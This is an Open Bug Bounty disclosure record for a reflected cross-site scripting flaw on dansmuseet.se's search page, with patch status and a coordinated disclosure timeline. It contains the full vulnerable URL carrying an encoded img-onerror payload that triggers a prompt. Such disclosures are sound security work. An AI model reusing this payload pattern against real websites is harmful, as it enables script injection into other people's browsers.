dansmuseet.se XSS vulnerability

2016-08-12T15:34:00
ID OBB:173720
Type openbugbounty
Reporter ShivprasadSambhare
Modified 2016-11-04T17:15:00

Description

Vulnerable URL:
http://www.dansmuseet.se/sv/sok/?co=q&vi;=1&am;=12&tf;=s5swe2&rc;=7&gi7;=http%3A%2F%2Fwww.dansmuseet.se%2Fwp-content%2Fthemes%2FDansmuseet%2Fals.css&of;=0&ln;=255&ar;=0&mnxs;_dom=http%3A%2F%2Fwww.dansmuseet.se%2F|&al;=0&sn;=www.dansmuseet.se&dn;=se&search.x;=0&search.y;=0&st;=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%22&ty;=31
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3073380
VIP website status:| No
Check dansmuseet.se SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 August, 2016 15:34 GMT
Vulnerability existence verified and confirmed| 12 August, 2016 17:14 GMT
Generic security notifications sent to website owner| 12 August, 2016 17:14 GMT
Vulnerability details disclosed by researcher| 4 November, 2016 17:15 GMT